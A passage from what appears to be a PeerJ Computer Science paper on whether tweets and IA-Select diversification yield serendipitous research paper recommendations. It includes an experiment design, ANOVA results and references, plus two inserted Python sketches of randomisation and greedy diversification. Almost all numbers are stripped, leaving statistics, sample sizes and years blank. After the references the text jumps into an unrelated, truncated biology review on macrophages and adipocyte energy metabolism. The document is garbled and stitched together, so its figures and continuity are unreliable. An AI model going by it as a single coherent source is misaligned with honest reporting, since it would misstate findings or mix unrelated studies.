papers) together. the basic idea of ia-select is that, for those features of a user profile that have been covered by papers already selected for recommendation, the weights are lowered in an iterative manner. 
ranking method

finally, we rank all the candidate items to determine which items should be recommended to a user. in this factor, we compare two ranking methods: cosine similarity and diversification with ia-select (agrawal et al., ).

- cosine similarity: as a baseline, we employ cosine similarity, which has been widely used in content-based recommender systems. the top-k items with the largest cosine similarities are recommended.
- ia-select: following this, we employ ia-select (agrawal et al., ) to deliver serendipitous recommendations. ia-select was originally introduced for information retrieval, but it is also used in recommender systems to improve serendipity (vargas, castells & vallet, ). this use stems from the algorithm's ability to diversify the recommendations in a list, which relies on avoiding recommending similar items (e.g. research papers) together. the basic idea of ia-select is that, for those features of a user profile that have already been covered by papers selected for recommendation, the weights are lowered in an iterative manner. at the outset, the algorithm computes the cosine similarities between the user and each candidate item. in turn, ia-select adds the item with the largest cosine similarity to the recommendation list. after selecting the item, ia-select decreases the weights of the features covered by the selected item in the user profile. these steps are repeated until k recommendations are determined. for example, recommendations for a user profile p_u = ((f1, w1), (f2, w2)), in which f1 carries most of the weight, will mostly contain documents that include feature f1. however, with ia-select, the f1 score is decremented iteratively whenever selected documents contain the f1 feature. thus, the probability increases that documents covering the f2 feature are included in the list of recommended items.

overall, the three factors with the design choices described above result in 2 × 3 × 2 = 12 available strategies. the evaluation procedure used to compare the strategies is provided below.

evaluation

to address the two research questions with the three experimental factors described in the previous section, we conduct an online experiment with subjects. the experiment is based in the field of computer science, in which an open access culture for research papers exists, and twitter is chosen as the focal point because it is an established means by which researchers disseminate their work. the experimental design adopted in this study is consistent with previous studies (nishioka & scherp, ; chen et al., ). in this section, the experimental design is described, after which an account of the utilised datasets (i.e. a corpus of research papers and a knowledge graph for the text mining methods) is given. following this, descriptive statistics are presented for the research subjects, and finally, the serendipity score is stated. the purpose of the serendipity score is to evaluate the degree to which each recommender strategy is effective in generating serendipitous recommendations.

procedure

we implemented a web application that enabled the subjects (n = ) to evaluate the recommendation strategies described above. first, subjects started on the welcome page, which asked for their consent to collect their data. thereafter, the subjects were asked to input their twitter handle and their name as recorded in dblp persons (https://dblp.uni-trier.de/pers/). based on the user's name, we retrieved a list of their research papers and obtained the content of the papers by mapping them to the acm citation network v dataset (see below). the top five recommendations were computed for each strategy, as shown in fig. . thus, each subject evaluated 12 × 5 = 60 items as "interesting" or "not interesting" based on the perceived relevance to their research interests. a binary evaluation was chosen to minimise the effort of the rating process, consistent with several previous studies (nishioka & scherp, ; chen et al., ). as shown in fig. , the recommended items were displayed with bibliographic information such as the authors, title, year, and venue. finally, the subjects were provided with the opportunity to access and read the research paper directly by clicking on a link. in order to avoid bias, the sequence in which the strategies appeared was randomised for each subject. this corresponds to earlier experimental setups such as a research paper recommender system in the domain of economics (nishioka & scherp, ) and other studies (chen et al., ).
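a minimal sketch of the two randomisation steps, the strategy order per subject and, as noted next, the item order within each list, follows; the strategy and item names are made up for illustration.

import random

strategies = ["tfidf-papers-cossim", "tfidf-papers-iaselect", "cfidf-twitter-cossim"]  # made-up names
recommendations = {s: [f"{s}-item-{i}" for i in range(1, 6)] for s in strategies}

random.shuffle(strategies)                 # random strategy order for this subject
for strategy in strategies:
    items = list(recommendations[strategy])
    random.shuffle(items)                  # random item order within the top-5 list
    print(strategy, items)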
at the same time, the list of the top items for each strategy was also randomised to avoid the well-documented phenomenon of ranking bias (bostandjiev, o'donovan & höllerer, ; chen et al., ). the subjects were informed about the randomised order of the strategies and items on the evaluation page. the actual ranks of the recommended items, as well as their position on the evaluation page, were stored in a database for later analyses. after evaluating all strategies, the subjects were asked to complete a questionnaire focusing on demographic information (e.g. age, profession, highest academic degree, and current employment status). finally, an opportunity was provided for the subjects to provide qualitative feedback.

figure: screenshot of the evaluation page. each subject rated an item as either "interesting" or "not interesting" based on their research interests.

datasets

the candidate items for the experiment were computer science articles drawn from a large dataset of research papers. to analyse and extract semantic concepts from the research papers and tweets, an external computer science knowledge base was used. this section describes the research papers and the knowledge graph used for the experiment.

research papers

since the experiment recommended research papers from the field of computer science, a corpus of research papers and a knowledge base from the same field were used. the acm citation network v dataset (https://lfs.aminer.org/lab-datasets/citation/citation-acm-v .txt.tgz), provided by arnetminer (tang et al., ), was used as the corpus of research papers. from the dataset, , , of the available , , research papers were included that had a title, author, year of publication, venue, and abstract. titles and abstracts were used to generate the paper profiles.

knowledge graph

the acm computing classification system (ccs) was used as the knowledge graph for cf-idf and hcf-idf (https://www.acm.org/publications/class- ). the knowledge graph, which is freely available, is characterised by its focus on computer science, as well as its hierarchical structure. it consists of , concepts and , labels, which are organised on six levels. on average, a concept is represented by . labels (sd: . ). for the text mining methods (i.e. cf-idf and hcf-idf), we extracted concepts from each user's tweets and research papers by matching the text with the labels of the concepts in the knowledge graph. as such, we applied what is known in the literature as the gazetteer-based approach. before processing, we lemmatised both the tweets and the research papers using stanford core nlp (https://stanfordnlp.github.io/corenlp/), and stop words were removed. regarding tweets, which often contain hashtags to indicate topics and user mentions, only the # and @ symbols were removed from the tweets. this decision stemmed from an observation made by feng & wang ( ), namely that the combination of tweets' texts with hashtags and user mentions results in the optimal recommendation performance.

subjects

overall, subjects were recruited through twitter and mailing lists. were male and two were female, and the average age was . years old (sd: . ). several of the subjects held master's degrees (n = ), while the others held a phd (n = ) or were lecturers or
professors (n = ). in terms of the subjects' employment status, were working in academia and three in industry. the table below shows the countries where the subjects work.

table: the number of subjects in each country. countries represented: germany, us, china, uk, austria, brazil, france, ireland, norway, sweden.

on average, the subjects published , . tweets (sd: , . ), with the minimum value being and the maximum value being , . an average of , . terms (sd: , . ) was extracted from the tweets, along with an average of . concepts (sd: . ). thus, on average, . terms (sd: . ) and . concepts (sd: . ) were included per tweet. we show a histogram regarding the number of terms in tweets per subject in fig. . we observe that the subjects are divided into those with a small total number of terms in their tweets and those with a large total number of terms in their tweets.

figure: distribution of subjects with regard to the number of terms in their tweets. the x-axis shows the number of terms in their tweets; the y-axis shows the number of subjects. for instance, there are five subjects whose total number of terms in tweets is between , and , .

regarding the use of research papers for user profiling, the subjects had published an average of . papers (sd: . ). on average, . terms (sd: , ) and . concepts (sd: . ) were identified in their research papers. this led to . terms (sd: . ) and . concepts (sd: . ) per paper. the next figure shows a histogram regarding the number of terms in research papers per subject. we see
rather, we were aiming to detect indirectly from the subjects’ responses, if the serendipity feature had an influence on the dependent variables. furthermore, we wanted to keep the online evaluation as simple as possible. asking for “how surprising” a recommendation is, increases the complexity of the experiment. subjects needed to know what a non-surprising recommendation is (in comparison). in addition, the cognitive efforts figure distribution of subjects with regarding to the number of terms in their research papers. the x-axis shows the number of terms in their research papers. the y-axis shows the number of sub- jects. for instance, there are two subjects whose total number of terms in research papers is between , and , . full-size doi: . /peerj-cs. /fig- nishioka et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ required to conduct a direct evaluation of unexpectedness is much higher and it is in general difficult for subjects to share the concept of the unexpectedness. results the purpose of this section is to present the results of the experiment. at the outset, the quantitative analysis is examined, which shows the optimal strategy in terms of srdp. in turn, the impact of each of the three experimental factors is analysed. comparison of the strategies the results of the strategies in terms of their srdp values are presented in table . as previously noted, this study drew on own papers × tf-idf × cosine similarity as a primitive strategy. thus, for this particular strategy, the mean and standard deviation are . . the purpose of an analysis of variance (anova) is to detect significant differences between variables. therefore, in this study, anova was used to identify whether any of the strategies were significantly different. the significance level was set to α = . . mauchly’s test revealed a violation of sphericity (χ ( ) = . , p = . ), which could lead to positively biased f-statistics and, consequently, an increase in the risk of false positives. therefore, a greenhouse-geisser correction with ε = . was applied. the results of the anova test revealed that significant differences existed between the strategies (f( . , . ) = . , p = . ). therefore, shaffer’s modified sequentially rejective bonferroni procedure was undertaken to compute the pairwise differences between the strategies (shaffer, ). we observed significant differences between the primitive strategy and one of the other strategies. table srdp and the number of unexpected items included in the strategies. the values are ordered by srdp. m and sd denote mean and standard deviation, respectively. strategy srdp |ue| text mining method profiling source ranking method m (sd) m (sd) . tf-idf own papers ia-select . ( . ) . ( . ) . cf-idf twitter cossim . ( . ) . ( . ) . tf-idf twitter ia-select . ( . ) . ( . ) . cf-idf twitter ia-select . ( . ) . ( . ) . cf-idf own papers cossim . ( . ) . ( . ) . cf-idf own papers ia-select . ( . ) . ( . ) . hcf-idf own papers ia-select . ( . ) . ( . ) . hcf-idf twitter cossim . ( . ) . ( . ) . tf-idf twitter cossim . ( . ) . ( . ) . hcf-idf twitter ia-select . ( . ) . ( . ) . hcf-idf own papers cossim . ( . ) . ( . ) . tf-idf own papers cossim . ( . ) . ( . ) nishioka et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
impact of experimental factors
in order to analyse the impact of each experimental factor, a three-way repeated-measures anova was conducted. the mendoza test identified violations of sphericity for the following factors: firstly, user profile source × text mining method × ranking method (χ²( ) = . , p = . ); and secondly, text mining method × ranking method (χ²( ) = . , p = . ) (mendoza, ). thus, a three-way repeated-measures anova was applied with a greenhouse-geisser correction of ε = . for the factor user profile source × text mining method × ranking method and ε = . for the factor text mining method × ranking method. the table below shows the results with the f-ratio, effect size η², and p-value. regarding the single factors, ranking method had the largest impact on srdp, as the effect size η² indicates. for all the factors with significant differences, we applied a post-hoc analysis using shaffer's msrb procedure. the results of the post-hoc analysis revealed that the strategies using ia-select resulted in higher srdp values when compared to those using cosine similarity. in addition, we observed a significant difference in the factors user profile source × ranking method and text mining method × ranking method. for both factors, post-hoc analyses revealed significant differences when a baseline was used in either of the two factors. when a baseline was used in one factor, |ue| became small unless a method other than a baseline was used in the other factor.

table: three-way repeated-measures anova for srdp with greenhouse-geisser correction, reporting the f-ratio, effect size η², and p-value for each factor (p-values marked in bold if p < . , which indicates a significant difference in a factor). factors: user profile source; text mining method; ranking method; user profile source × text mining method; user profile source × ranking method; text mining method × ranking method; user profile source × text mining method × ranking method.

discussion
this section discusses the study's results in relation to the two research questions. in turn, we review the results for the text mining method factor, which was found to have the largest influence on recommendation performance among the three factors.

rq : do a user's tweets generate serendipitous recommendations?
regarding rq , the results of the experiment indicate that a user's tweets do not improve the serendipity of recommendations. as shown in the rightmost column of the strategies table above, tweets deliver unexpected recommendations to users, but only a small fraction of these are interesting to the users. this result differs from previous works. for instance, chen et al. ( ) observed that the precision of a webpage recommender system based on a user's tweets was around . . in addition, lu, lam & zhang ( ) showed that a concept-based tweet recommender system based on a user's tweets achieves a precision of . . one way to account for this result is by drawing attention to the high probability that the users employed their twitter accounts for purposes other than professional, research-related ones. in particular, the users are likely to have used their twitter accounts to express private interests. we presumed that taking private interests into consideration delivers serendipitous recommendations.
this is because the recommender system would then suggest research papers that reflect both professional and private interests, and which are thus likely to be serendipitous. in the future, it may be helpful to introduce explanation interfaces for recommender systems (herlocker, konstan & riedl, ; tintarev & masthoff, ). the purpose of these explanation interfaces is to show why a specific item is being recommended to users, thereby enabling users to find a connection between a recommended paper and their interests.

rq : is it possible to improve a recommendation list's serendipity through diversification?
in terms of rq , the results indicate that the diversification of a recommendation list using the ia-select algorithm delivers serendipitous recommendations. this confirms results published elsewhere in the literature, which have found that ia-select improves serendipity (vargas, castells & vallet, ; vargas & castells, ). for instance, in the domain of movies and music, vargas & castells ( ) employed ia-select for recommender systems and confirmed that it provides unexpected recommendations. additionally, the iterative decrease of covered interests was associated with greater variety in recommender systems for scientific publications. furthermore, the experiment demonstrated that diversified recommendations are likely to be associated with greater utility for users.

text mining methods
among the three factors, the text mining method factor was associated with the most substantial impact on recommender system performance. in contrast to observations made in previous literature (goossen et al., ; nishioka & scherp, ), cf-idf and hcf-idf did not yield effective results. it is worth emphasising that this result could have been influenced by the quality of the knowledge graph used in this study (i.e. acm ccs), particularly in view of the fact that the performance of many text mining methods is directly informed by the quality of the knowledge graph (nishioka, große-bölting & scherp, ). another way to account for the poor outcomes relates to the age of the knowledge graph. in particular, acm ccs has not been updated since , despite the fact that computer science is a rapidly changing field of inquiry. furthermore, relatively few concepts and labels were included in the knowledge base, which contrasts with the large numbers included in the knowledge graphs used in previous studies; for example, the stw thesaurus for economics used , concepts and , labels, respectively (nishioka & scherp, ). hence, the number of concepts and labels could have influenced the quality of the knowledge graph and, in turn, the recommender system's performance. in addition, while a previous study that used hcf-idf (nishioka & scherp, ) only drew on the titles of research papers, our study used both titles and abstracts to construct paper profiles and user profiles when a user's own papers were selected as the user profile source. furthermore, since our study used sufficient information when mining research papers, we did not observe any differences among tf-idf, cf-idf, and hcf-idf, which can include related concepts. finally, as with any empirical experiment, data triangulation is needed before generalising any of the conclusions drawn in this paper. therefore, further studies of recommender systems in other domains and similar settings should be conducted.
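the greedy, interest-aware diversification behind ia-select can be sketched as follows; this is a simplified illustration under assumed data structures (candidate papers annotated with user-profile concepts plus a relevance score), not the original algorithm of agrawal et al. or the implementation used in this study. discounting the weights of concepts that are already covered mirrors the iterative decrease of covered interests described above.

```python
# simplified, ia-select-style greedy diversification; all names and the
# discount scheme are illustrative assumptions, not the exact algorithm.
from typing import Dict, List, Set

def diversify(candidates: Dict[str, Set[str]],
              relevance: Dict[str, float],
              concept_weights: Dict[str, float],
              k: int = 5,
              discount: float = 0.5) -> List[str]:
    weights = dict(concept_weights)      # remaining importance per concept
    remaining = set(candidates)
    ranking: List[str] = []
    while remaining and len(ranking) < k:
        # marginal utility: relevance weighted by still-uncovered concepts
        best = max(remaining,
                   key=lambda d: relevance[d] * sum(weights.get(c, 0.0)
                                                    for c in candidates[d]))
        ranking.append(best)
        remaining.remove(best)
        # discount the concepts the chosen paper already covers
        for c in candidates[best]:
            if c in weights:
                weights[c] *= discount
    return ranking

# toy example with acm-ccs-like concept annotations
papers = {"p1": {"ir", "recsys"}, "p2": {"ir"}, "p3": {"nlp"}, "p4": {"recsys"}}
rel = {"p1": 0.9, "p2": 0.8, "p3": 0.6, "p4": 0.7}
profile = {"ir": 0.5, "recsys": 0.4, "nlp": 0.3}
# -> ['p1', 'p2', 'p3']: p3 overtakes the more relevant p4 once recsys is covered
print(diversify(papers, rel, profile, k=3))
```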
in this article, we used only the textual information in tweets; we did not use the contents of urls mentioned in tweets, images, or videos. we observed that the subjects' tweets contain on average . urls (sd: . ). in the future, we would like to take these contents into account, as abel et al. ( ) did.

threats to validity
in this article, we only considered the domain of computer science; in other domains, the results and findings might be different. in the future, we would like to conduct studies in other domains, such as biomedical science (using medline), the social sciences and economics. in addition, the results shown in this article may potentially be influenced by the number of subjects we recruited. detecting significant effects with few subjects is harder than with many subjects; however, we observed several significant effects and measured the effect sizes, and we assume that adding more subjects would bring almost no additional insights. as noted in the related work, this study evaluates the serendipity of recommendations focusing on "unexpectedness to be found" and "unexpectedness to be recommended". this is motivated by our library setting, where we assume researchers are working on research papers and like to receive recommendations for literature that they have not found yet (vagliano et al., ). the other variations of serendipity proposed by kotkov et al. ( ), such as "unexpectedness to be relevant" and "implicit unexpectedness", are left for future studies.

conclusion
the purpose of this study's online experiment was to determine whether tweets and the ia-select algorithm have the capability to deliver serendipitous research paper recommendations. the results revealed that tweets do not improve the serendipity of recommendations, but ia-select does. we anticipate that this insight will contribute to the development of future recommender systems, principally because service providers and platform administrators can use the data presented here to make more informed design choices for the systems and services they develop. the data from this experiment are publicly available for further study and reuse (https://doi.org/ . /zenodo. ).

additional information and declarations
funding
this work was supported by the eu h project moving (no. ), the jsps grant-in-aid for scientific research (s) (no. h ), and the jsps grant-in-aid for young scientists (no. k ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors: eu h project moving: . jsps grant-in-aid for scientific research (s): h . jsps grant-in-aid for young scientists: k .

competing interests
the authors declare that they have no competing interests.

author contributions
- chifumi nishioka conceived and designed the experiments, analysed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.
- jörn hauke conceived and designed the experiments, performed the experiments, analysed the data, performed the computation work, prepared figures and/or tables, and approved the final draft.
- ansgar scherp conceived and designed the experiments, analysed the data, authored or reviewed drafts of the paper, and approved the final draft.
data availability
the following information was supplied regarding data availability: the data is available at zenodo: nishioka, chifumi, scherp, ansgar, & hauke, jörn. ( ). experimental result to investigate the influence of user's tweets and diversification on serendipitous research paper recommendations [data set]. zenodo. doi . /zenodo. .

references
abel f, gao q, houben g-j, tao k. . semantic enrichment of twitter posts for user profile construction on the social web. in: extended semantic web conference. springer, – .
abel f, herder e, krause d. . extraction of professional interests from social web profiles. in: international conference on user modeling, adaptation and personalization (umap).
achakulvisut t, acuna de, ruangrong t, kording k. . science concierge: a fast content-based recommendation system for scientific publications. plos one ( ):e doi . /journal.pone. .
agrawal r, gollapudi s, halverson a, ieong s. . diversifying search results. in: proceedings of the second acm international conference on web search and data mining. new york: acm, – .
bai x, wang m, lee i, yang z, kong x, xia f. . scientific paper recommendation: a survey. ieee access : – doi . /access. . .
beel j, gipp b, langer s, breitinger c. . research-paper recommender systems: a literature survey. international journal on digital libraries ( ): – doi . /s - - - .
bostandjiev s, o'donovan j, höllerer t. . taste-weights: a visual interactive hybrid recommender system. in: proceedings of the sixth acm conference on recommender systems. new york: acm.
carbonell jg, goldstein j. . the use of mmr, diversity-based reranking for reordering documents and producing summaries. in: proceedings of the st annual international acm sigir conference on research and development in information retrieval. new york: acm, – doi . / . .
chen j, nairn r, nelson l, bernstein m, chi e. . short and tweet: experiments on recommending content from information streams. in: proceedings of the sigchi conference on human factors in computing systems. new york: acm.
collins am, loftus ef. . a spreading-activation theory of semantic processing. psychological review ( ): – doi . / - x. . . .
feng w, wang j. . we can learn your #hashtags: connecting tweets to explicit topics. in: ieee th international conference on data engineering. ieee, – .
ge m, delgado-battenfeld c, jannach d. . beyond accuracy: evaluating recommender systems by coverage and serendipity. in: proceedings of the fourth acm conference on recommender systems. new york: acm, – .
goossen f, ijntema w, frasincar f, hogenboom f, kaymak u. . news personalization using the cf-idf semantic recommender. in: proceedings of the international conference on web intelligence, mining and semantics. new york: acm.
herlocker jl, konstan ja, riedl j. . explaining collaborative filtering recommendations. in: proceedings of the acm conference on computer supported cooperative work. new york: acm, – .
herlocker jl, konstan ja, terveen lg, riedl j. . evaluating collaborative filtering recommender systems. acm transactions on information systems (tois) ( ): – doi . / . .
kapanipathi p, jain p, venkataramani c, sheth a. . user interests identification on twitter using a hierarchical knowledge base. in: european semantic web conference. berlin: springer.
kaya b. . user profile based paper recommendation system. international journal of intelligent systems and applications in engineering ( ): – doi . /ijisae.
kotkov d, konstan ja, zhao q, veijalainen j. . investigating serendipity in recommender systems based on real user feedback. in: proceedings of the rd annual acm symposium on applied computing. – .
kotkov d, veijalainen j, wang s. . how does serendipity affect diversity in recommender systems? a serendipity-oriented greedy algorithm. computing ( ): – doi . /s - - - .
kotkov d, wang s, veijalainen j. . a survey of serendipity in recommender systems. knowledge-based systems : – doi . /j.knosys. . . .
letierce j, passant a, breslin jg, decker s. . understanding how twitter is used to spread scientific messages. in: the web science conference, at raleigh, nc, usa.
lops p, de gemmis m, semeraro g. . content-based recommender systems: state of the art and trends. in: ricci f, rokach l, shapira b, kantor p, eds. recommender systems handbook. boston: springer, – .
lu c, lam w, zhang y. . twitter user modeling and tweets recommendation based on wikipedia concept graph. in: workshops at the twenty-sixth aaai conference on artificial intelligence.
mcnee sm, riedl j, konstan ja. . being accurate is not enough: how accuracy metrics have hurt recommender systems. in: chi extended abstracts on human factors in computing systems. new york: acm, – .
mendoza jl. . a significance test for multisample sphericity. psychometrika ( ): – .
middleton se, shadbolt nr, de roure dc. . ontological user profiling in recommender systems. acm transactions on information systems (tois) ( ): – doi . / . .
nascimento c, laender ahf, da silva as, gonçalves ma. . a source independent framework for research paper recommendation. in: proceedings of the th annual international acm/ieee joint conference on digital libraries. new york: acm, – .
nishioka c, große-bölting g, scherp a. . influence of time on user profiling and recommending researchers in social media. in: proceedings of the th international conference on knowledge technologies and data-driven business. new york: acm doi . / . .
nishioka c, scherp a. . profiling vs. time vs. content: what does matter for top-k publication recommendation based on twitter profiles? in: proceedings of ieee/acm joint conference on digital libraries. new york: acm, – .
orlandi f, breslin j, passant a. . aggregated, interoperable and multi-domain user profiles for the social web. in: proceedings of the th international conference on semantic systems. new york: acm, – doi . / . .
salton g, buckley c. . term-weighting approaches in automatic text retrieval. information processing & management ( ): – .
shaffer jp. . modified sequentially rejective multiple test procedures. journal of the american statistical association ( ): – .
shani g, gunawardana a. . evaluating recommendation systems. in: ricci f, rokach l, shapira b, kantor p, eds. recommender systems handbook. boston: springer, – .
shen w, wang j, luo p, wang m. . linking named entities in tweets with knowledge base via user interest modeling. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – doi . / . .
sugiyama k, kan m-y. . scholarly paper recommendation via user's recent research interests. in: proceedings of the th annual joint conference on digital libraries. new york: acm, – doi . / . .
sugiyama k, kan m-y. . towards higher relevance and serendipity in scholarly paper recommendation. acm sigweb newsletter (winter): .
tang j, zhang j, yao l, li j, zhang l, su z. . arnetminer: extraction and mining of academic social networks. in: proceedings of the th acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – .
tintarev n, masthoff j. . effective explanations of recommendations: user-centered design. in: proceedings of the acm conference on recommender systems. new york: acm, – .
uchiyama k, nanba h, aizawa a, sagara t. . osusume: cross-lingual recommender system for research papers. in: proceedings of the workshop on context-awareness in retrieval and recommendation. new york: acm, – .
vagliano i, gunther f, heinz m, apaolaza a, bienia i, breitfuss g, blume t, collyda c, fessl a, gottfried s, hasitschka p, kellermann j, kohler t, maas a, mezaris v, saleh a, skulimowski amj, thalmann s, vigo m, wertner a, wiese m, scherp a. . open innovation in the big data era with the moving platform. ieee multimedia ( ): – doi . /mmul. . .
vargas s, castells p. . rank and relevance in novelty and diversity metrics for recommender systems. in: proceedings of the fifth acm conference on recommender systems. new york: acm, – .
vargas s, castells p, vallet d. . intent-oriented diversity in recommender systems. in: proceedings of the th international acm sigir conference on research and development in information retrieval. new york: acm, – .
vargas s, castells p, vallet d. . explicit relevance models in intent-oriented information retrieval diversification. in: proceedings of the th international acm sigir conference on research and development in information retrieval. new york: acm, – .
wu y, liu y, chen f, zhang m, ma s. . beyond greedy search: pruned exhaustive search for diversified result ranking. in: proceedings of the acm sigir international conference on theory of information retrieval. new york: acm, – .
ziegler c-n, mcnee sm, konstan ja, lausen g. . improving recommendation lists through topic diversification. in: proceedings of the th international conference on world wide web. new york: acm, – .
review
on the role of macrophages in the control of adipocyte energy metabolism
michaela keuper
department of molecular biosciences, the wenner-gren institute, stockholm university, stockholm, sweden
correspondence should be addressed to m keuper: michaela.keuper@su.se

abstract
the crosstalk between macrophages (mΦ) and adipocytes within white adipose tissue (wat) influences obesity-associated insulin resistance and other associated metabolic disorders, such as atherosclerosis, hypertension and type diabetes. mΦ infiltration is increased in wat during obesity, which is linked to decreased mitochondrial content and activity. the mechanistic interplay between mΦ and mitochondrial function of adipocytes is under intense investigation, as mΦ and inflammatory pathways exhibit a pivotal role in the reprogramming of wat metabolism in physiological responses during cold, fasting and exercise. thus, the underlying immunometabolic pathways may offer therapeutic targets to correct obesity and metabolic disease. here, i review the current knowledge on the quantity and the quality of human adipose tissue macrophages (atmΦ) and their impact on the bioenergetics of human adipocytes. the effects of atmΦ and their secreted factors on mitochondrial function of white adipocytes are discussed, including recent research on mΦ as part of an immune signaling cascade involved in the 'browning' of wat, which is defined as the conversion from white, energy-storing adipocytes into brown, energy-dissipating adipocytes.

keywords: inflammation, oxidative phosphorylation, glycolysis, cellular energy metabolism, obesity, diabetes

introduction
white adipose tissue (wat) is a metabolically active tissue that modifies systemic metabolism significantly by regulating the storage and release of lipids. free fatty acids serve as a major fuel source during times of energy scarcity and high energy demands, such as exercise, cold exposure and immune responses. the dysregulation of fatty acid release contributes to dyslipidemia, resulting in ectopic fat deposition into various organs. ectopic fat in turn impairs organ functionality, as seen during many metabolic diseases. importantly, wat also releases metabolites other than fatty acids (e.g. lactate as a glycolytic end-product) ( ). beyond the direct metabolic effects, wat also mediates endocrine crosstalk by secretion of various adipokines (e.g. adiponectin and leptin) ( , ). the crucial role of mitochondrial activity for wat function is well established and impacts the capacity of lipid storage ( , ) and secretory function ( , , ). clinical studies substantiate the strong association between decreased mitochondrial content and oxygen consumption of wat/adipocytes, which is in particular evident during metabolic complications such as insulin resistance, type diabetes (t dm) and cardiovascular diseases ( , , , , ). a crucial hallmark in the development of obesity-associated metabolic disorders is the chronic, low-grade inflammation of wat ( , ). although obesity-associated inflammation and macrophage (mΦ) infiltration affect many tissues (such as liver, muscle, brain and pancreas ( , , , , )), the infiltration into wat is disproportionately increased. notably, it has been suggested that the obesity-associated inflammation of human wat compromises mitochondrial function ( , , , ).
adipose tissue macrophages (atmΦ) also reside in the wat of lean and healthy individuals, suggesting a fundamental physiological role for atmΦ beyond the context of pathology (fig. ). some inflammatory processes appear to be important for healthy wat expansion ( ). the atmΦ-secreted cytokines and chemokines act in an autocrine and paracrine manner, the latter by controlling the inflammatory response of other immune cells or possibly impacting the metabolism of adjacent adipocytes. recent mouse studies suggest the secretion of atmΦ factors that metabolically enhance adipocytes during cold, stress and exercise ( , , ), which has been broadly termed the 'browning' of wat. some mechanistic aspects of mΦ-induced browning have been questioned ( , ), but most studies collectively support a role for mΦ in the energy metabolism of adipocytes, in particular in controlling adipocyte mitochondrial function ( , , , , , ). taken together, there is accumulating evidence that atmΦ enhance or suppress mitochondrial function in wat. understanding how adipocyte energy metabolism and mitochondria are regulated during physiological and pathophysiological adaptation requires a mechanistic understanding of the immunometabolic interaction between atmΦ and adipocytes. the molecular networks of this interaction may offer potential interference points to correct imbalanced metabolism during pathological situations such as obesity and t dm.

adipose tissue macrophages (atmΦ)
mΦ number increases in human white adipose tissue during obesity
atmΦ are numerically the dominant type of immune cells in human wat, and obesity further enhances mΦ numbers in wat, which contributes to obesity-related immune imbalances (fig. a).

figure: obesity-associated impaired immune balance in white adipose tissue. (a) obesity is associated with an impaired immune balance toward a pro-inflammatory state in wat. all fat depots are affected, but mostly the viscwat. (b) atmΦ amount is low in lean scwat (~ % of svf); however, mΦ are numerically the dominant type of immune cells, representing half of the immune cells. mΦ increase in obese wat, for example in human scwat from to % of the svf ( ). (c) the roles of atmΦ in lean (left) and obese (right) wat. the number of mΦ is low and they are interspersed between adipocytes in wat of lean subjects, contrasting the higher number and local accumulation of mΦ in crown-like structures during obesity, which is fostered by proliferation, high immigration and low emigration. the low inflammatory profile (surface markers, cytokine expression and secretion, e.g. il , il ) in lean subjects transforms into a higher inflammatory status (e.g. tnfα, il , il β) during obesity.

however, the data on the
cellular composition of wat (and thus the amount of atmΦ) vary quantitatively between studies, depending on donor, fat depot, wat isolation/processing method and molecular readout. the relative amount of mΦ varies from as little as ≤ % (cd c+ cells, immunohistochemistry) in lean human scwat ( ), to up to % in obese scwat, as seen in the first report from weisberg et al. (cd + cells, immunohistochemistry) ( ). the recent publication from ehrlund et al. found that the stromal vascular fraction (svf) of scwat from lean donors consists of ~ % progenitors including preadipocytes, ~ % endothelial cells, ~ % immune cells (and an undetermined rest) ( ) (fig. b). half of this immune cell population is represented by mΦ (cd +/cd + cells), whereas the other half is represented by t cells, b cells, mast cells, neutrophils and eosinophils. this study also reports that mΦ content significantly increases during obesity to ~ % of svf in scwat ( ). the identified numbers of ~ % mΦ in lean scwat and ~ % in obese scwat (fig. b) agree well with other reports ( , , , , , , , , , , ). several publications show increased mΦ numbers in wat during obesity that are more pronounced in viscwat than in scwat ( , , ). the atmΦ numbers in both viscwat and scwat correlate with bmi ( , , ). although atmΦ increase significantly in viscwat during obesity, a recent publication also notes that the relative contribution of mΦ to the svf is much smaller in viscwat (lean: %; obese: %) as compared to scwat ( ). comparing immune cell populations in viscwat from lean, middle-aged, male mice to cynomolgus macaques and healthy humans revealed that mΦ are the dominant immune cell type in murine viscwat, whereas in humans and cynomolgus macaques, t cells dominate, followed by mΦ as the second largest immune cell population ( ). considering these cross-species comparisons, mΦ may not always be the most abundant immune cell type in adipose tissue. nevertheless, mΦ are present in scwat and viscwat with increasing numbers during obesity. furthermore, the obese condition alters their quality, comprising the mode of activation and the diversity of the secretome.

the local accumulation of atmΦ in obese wat
excessive energy intake (overnutrition) is broadly accepted as an inducer of increased atmΦ infiltration in obese wat, causing adipocyte hypertrophy and hypoxia, eventually leading to adipocyte dysfunction, cell death and fibrosis. this scenario is accompanied by higher levels of chemoattractant cytokines such as chemokine (c-c motif) ligand (ccl /mcp- ), chemokine (c-c motif) ligand (ccl /mip a) and others. these cytokines provide a chemotactic gradient that attracts monocytes into wat ( , , , ). inside wat, monocytes enhance the chemotactic gradient by secreting their own chemokines, thereby attracting additional mΦ and setting up a feed-forward inflammatory process.
between lean and obese, not only the number of mΦ changes, but also their localization: in lean wat, atmΦ are interstitially spaced, contrasting the local accumulation of atmΦ in so-called 'crown-like structures' around dead, apoptotic adipocytes and/or fibrotic areas in obese wat ( , , ). mouse studies indicate that the increased mΦ content in obese wat presumably results from several processes: higher rates of recruited/infiltrating monocytes (e.g. via ccl , see above) ( , , ), proliferation of wat-resident monocytes ( , ) and lower emigration rates of atmΦ out of obese wat (e.g. via netrin ) ( ).

the physiological importance of dynamic atmΦ for wat biology
